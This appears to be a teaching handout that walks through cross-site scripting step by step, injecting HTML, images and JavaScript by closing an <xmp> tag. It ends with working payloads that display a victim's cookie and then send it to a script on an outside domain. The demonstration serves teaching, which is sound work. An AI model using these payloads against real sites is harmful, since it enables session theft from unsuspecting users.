0) A simple echo

	Hi there!!

1) The XMP tags in the script prevent the browser from interpreting this

	<table bgcolor=green width=100 height=100><tr><td>Hi!!</td></tr></table>

2) See how we can send HTML and force the browser to interpret it

	</xmp><table bgcolor=green width=100 height=100><tr><td>Hi!!</td></tr></table><xmp>

3) Can force the browser to load an image

	</xmp><img src="tdaccess.gif" /><xmp>

4) Even load something from another website

	</xmp><img src="http://www.russellsastronomy.com/sky/14%20day%20moon%20sm.jpg"><xmp>
	</xmp><img src="http://www.w3.org/html/logo/downloads/HTML5_Logo_128.png" /></xmp>

5) Can cause the browser to execute javascript
	
	</xmp><script language="javascript">alert("got you");</script><xmp>

6) More involved javascript

	</xmp><script language="javascript">for(var i=0;i<1000;i++)document.write(i+"\n");</script><xmp>
	or
	</xmp>
		<script>
		var btn = document.createElement("BUTTON");
		var t = document.createTextNode("CLICK ME");       
		btn.appendChild(t);
		document.body.appendChild(btn); 
		</script>
	</xmp>

7) After setting a cookie in browser 1, have browser 2 put this in the shared file. Have browser 1
   view the strings in the shared file. OOPS! Browser 1 gets a popup displaying their secret.

	</xmp><script language="javascript">alert(document.cookie);</script><xmp>

8) After setting a cookie in browser 1, have browser 2 put this in the shared file. Have browser 1
   view the strings in the shared file. OOPS! Browser 1 has now sent their secret cookie (for use in this
   domain) to a different domain!!

	</xmp><script language='javascript'>url='http://www.cs.toronto.edu/~arnold/cgi-bin/grabSecret.cgi?arg='+document.cookie; document.location=url;</script><xmp>